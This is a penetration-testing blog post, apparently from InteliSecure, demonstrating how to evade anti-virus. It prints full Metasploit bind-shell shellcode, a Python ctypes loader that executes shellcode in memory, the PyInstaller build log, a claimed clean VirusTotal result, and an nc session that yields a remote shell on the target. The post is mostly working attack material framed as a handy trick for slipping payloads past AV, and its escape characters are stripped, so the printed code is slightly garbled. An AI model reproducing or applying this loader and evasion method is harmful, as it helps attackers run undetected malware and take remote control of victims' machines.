Execute Shellcode, Bypassing Anti-Virus | InteliSecure

Execute Shellcode, Bypassing Anti-Virus | InteliSecure

I am going to demonstrate a little trick to allow you to bypass anti-virus and execute shellcode, this is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell, however any shellcode can be used, I have simply chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "n" "," | sed s'/,//g' && echo ""
xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x31xdbx53x68x02x00x7ax69x89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5
root@kali:~#

Copy the line of shellcode that gets returned, we will paste it into the binary later. Be aware, if you do change the payload the above command will not work as it is specific to that payload (for extracting the opcodes from the msfpayload output).

Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.

The following piece of Python code takes shellcode as input and moves it into the newly created memory space, finally executing it and bypassing anti-virus. Using VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject we achieve this. Here is the Python code:

#!C:Python27python.exe

from ctypes import *

# Grab shellcode from the user so its not hardcoded.
sc = bytearray(input("Paste the shellcode inside single quotes:nn"))
print "nnRunning shellcode in memory...nn"

# Reserves or commits a region of pages in the virtual address space of the calling process.
pointer = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))

buffer = (c_char * len(sc)).from_buffer(sc)

# The RtlMoveMemory routine copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(pointer),
                              buffer,
                              c_int(len(sc)))
# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(pointer),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))
# Waits until the specified object is in the signaled state or the time-out interval elapses.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, you're shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to an win32 executable using PyInstaller:

C:Usersmike.evansDesktopAV>c:Python27Scriptspyinstaller.exe -F crypter2.py
82 INFO: wrote C:Usersmike.evansDesktopAVcrypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:Usersmike.evansDesktopAV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:WindowsWinSxSManifestsx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcm90.dll
2058 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloader_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_importers.py
3628 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_archive.py
3693 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_carchive.py
3752 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:Windowssystem32python27.dll
4450 INFO: Warnings written to C:Usersmike.evansDesktopAVbuildcrypter2warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:Usersmike.evansDesktopAVdistcrypter2.exe

Now we have the binary, lets check VirusTotal and see what it scores:

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:

C:Usersmike.evansDesktopAVdist>crypter2.exe
Paste the shellcode inside single quotes:

'xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x31xdbx53x68x02x00x7ax69x89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5'

Running shellcode in memory...

Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:Usersmike.evansDesktopAVdist>whoami
whoami
win-2q626uv3ptemike.evans

C:Usersmike.evansDesktopAVdist>

This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.